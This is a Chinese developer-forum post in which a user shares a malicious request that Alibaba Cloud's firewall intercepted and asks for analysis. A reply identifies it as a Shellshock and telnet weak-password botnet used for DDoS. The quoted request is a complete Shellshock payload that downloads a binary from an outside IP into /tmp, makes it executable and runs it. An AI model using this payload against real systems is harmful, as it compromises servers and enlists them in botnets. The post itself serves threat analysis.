云盾截获一个恶意请求,各位是否有兴趣分析一下?
42.96.xxx.xxx/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -o /tmp/china.z-pobr >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-pobr >> /tmp/run.sh;echo /tmp/china.z-pobr >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
下载出来的"java"文件是个ELF
展开
收起
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
1
条回答
写回答
-
基于shellshock和telnet弱口令破解的僵尸网络.
主要穷举telnet若口令,然后远程下载木马,执行后telnet&DDOS其他ip
2019-07-17 19:39:04赞同 展开评论
相关问答